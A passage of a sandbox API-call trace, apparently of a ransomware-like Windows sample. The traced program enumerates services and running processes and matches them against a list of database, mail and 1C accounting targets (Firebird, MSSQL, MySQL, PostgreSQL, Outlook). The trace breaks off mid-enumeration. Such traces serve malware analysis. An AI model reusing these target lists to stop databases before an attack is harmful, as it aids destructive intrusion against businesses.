lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0053.107] GetLastError () returned 0xea [0053.107] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x3fe70d0 [0053.107] EnumServicesStatusExW (in: hSCManager=0x626e60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3fe70d0, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3fe70d0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0053.108] CloseServiceHandle (hSCObject=0x626e60) returned 1 [0053.108] lstrlenW (lpString="Appinfo") returned 7 [0053.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0053.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0053.109] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0053.109] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0053.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0053.109] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0053.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.109] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0053.109] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0053.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0053.109] lstrlenW (lpString="AudioSrv") returned 8 [0053.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0053.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0053.109] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0053.109] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0053.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0053.109] lstrlenW (lpString="BFE") returned 3 [0053.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0053.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0053.109] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0053.109] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0053.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0053.109] lstrlenW (lpString="CryptSvc") returned 8 [0053.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0053.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0053.109] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0053.109] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0053.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0053.109] lstrlenW (lpString="CscService") returned 10 [0053.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0053.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0053.110] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0053.110] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0053.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0053.110] lstrlenW (lpString="DcomLaunch") returned 10 [0053.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.110] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0053.110] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0053.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0053.110] lstrlenW (lpString="Dhcp") returned 4 [0053.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0053.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0053.110] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0053.110] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0053.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0053.110] lstrlenW (lpString="Dnscache") returned 8 [0053.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0053.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0053.110] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0053.110] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0053.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0053.110] lstrlenW (lpString="DPS") returned 3 [0053.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0053.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0053.110] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0053.110] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0053.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0053.110] lstrlenW (lpString="eventlog") returned 8 [0053.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0053.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0053.110] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0053.110] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0053.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0053.110] lstrlenW (lpString="EventSystem") returned 11 [0053.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0053.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0053.111] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0053.111] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0053.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0053.111] lstrlenW (lpString="gpsvc") returned 5 [0053.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0053.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0053.111] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0053.111] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0053.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0053.111] lstrlenW (lpString="iphlpsvc") returned 8 [0053.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.111] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0053.111] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0053.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0053.111] lstrlenW (lpString="LanmanServer") returned 12 [0053.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0053.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0053.111] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0053.111] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0053.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0053.111] lstrlenW (lpString="LanmanWorkstation") returned 17 [0053.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.111] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0053.111] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0053.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0053.111] lstrlenW (lpString="lmhosts") returned 7 [0053.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0053.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0053.111] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0053.111] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0053.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0053.111] lstrlenW (lpString="MMCSS") returned 5 [0053.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0053.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0053.112] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0053.112] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0053.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0053.112] lstrlenW (lpString="MpsSvc") returned 6 [0053.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0053.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0053.112] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0053.112] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0053.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0053.112] lstrlenW (lpString="Netman") returned 6 [0053.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0053.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0053.112] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0053.112] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0053.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0053.112] lstrlenW (lpString="netprofm") returned 8 [0053.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0053.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0053.112] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0053.112] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0053.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0053.112] lstrlenW (lpString="NlaSvc") returned 6 [0053.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0053.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0053.112] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0053.112] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0053.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0053.112] lstrlenW (lpString="nsi") returned 3 [0053.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0053.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0053.112] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0053.112] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0053.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0053.112] lstrlenW (lpString="PcaSvc") returned 6 [0053.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0053.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0053.113] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0053.113] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0053.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0053.113] lstrlenW (lpString="PlugPlay") returned 8 [0053.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0053.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0053.113] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0053.113] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0053.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0053.113] lstrlenW (lpString="Power") returned 5 [0053.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0053.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0053.113] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0053.113] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0053.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0053.113] lstrlenW (lpString="ProfSvc") returned 7 [0053.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0053.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0053.113] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0053.113] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0053.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0053.113] lstrlenW (lpString="RpcEptMapper") returned 12 [0053.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.113] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0053.113] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0053.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0053.113] lstrlenW (lpString="RpcSs") returned 5 [0053.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0053.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0053.113] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0053.113] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0053.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0053.114] lstrlenW (lpString="SamSs") returned 5 [0053.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0053.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0053.114] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0053.114] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0053.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0053.114] lstrlenW (lpString="Schedule") returned 8 [0053.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0053.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0053.114] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0053.114] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0053.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0053.114] lstrlenW (lpString="SENS") returned 4 [0053.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0053.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0053.114] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0053.114] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0053.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0053.114] lstrlenW (lpString="ShellHWDetection") returned 16 [0053.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.114] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0053.114] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0053.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0053.114] lstrlenW (lpString="Spooler") returned 7 [0053.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0053.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0053.114] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0053.114] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0053.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0053.114] lstrlenW (lpString="swprv") returned 5 [0053.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0053.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0053.114] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0053.115] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0053.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0053.115] lstrlenW (lpString="SysMain") returned 7 [0053.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0053.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0053.115] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0053.115] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0053.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0053.115] lstrlenW (lpString="Themes") returned 6 [0053.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0053.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0053.115] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0053.115] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0053.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0053.115] lstrlenW (lpString="TrkWks") returned 6 [0053.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0053.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0053.115] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0053.115] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0053.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0053.115] lstrlenW (lpString="UxSms") returned 5 [0053.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0053.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0053.115] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0053.115] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0053.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0053.115] lstrlenW (lpString="VSS") returned 3 [0053.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0053.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0053.115] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0053.115] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0053.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0053.115] lstrlenW (lpString="WdiServiceHost") returned 14 [0053.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.115] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0053.116] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0053.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0053.116] lstrlenW (lpString="WdiSystemHost") returned 13 [0053.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.116] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0053.116] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0053.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0053.116] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0053.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.116] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0053.116] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0053.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0053.116] lstrlenW (lpString="Winmgmt") returned 7 [0053.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0053.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0053.116] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0053.116] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0053.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0053.116] lstrlenW (lpString="WPDBusEnum") returned 10 [0053.116] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.116] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.116] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0053.116] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0053.116] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0053.116] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0053.116] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4 [0053.119] Process32FirstW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.120] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.120] lstrlenW (lpString="System") returned 6 [0053.120] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0053.120] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0053.120] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0053.120] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0053.120] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0053.120] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0053.120] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0053.120] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.121] lstrlenW (lpString="smss.exe") returned 8 [0053.121] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0053.121] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0053.121] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0053.121] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0053.121] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0053.121] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0053.121] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0053.121] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.122] lstrlenW (lpString="csrss.exe") returned 9 [0053.122] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0053.122] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0053.122] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0053.122] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0053.122] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0053.122] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0053.122] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0053.122] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.123] lstrlenW (lpString="wininit.exe") returned 11 [0053.123] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0053.123] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0053.123] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0053.123] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.123] lstrlenW (lpString="csrss.exe") returned 9 [0053.124] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.124] lstrlenW (lpString="winlogon.exe") returned 12 [0053.124] 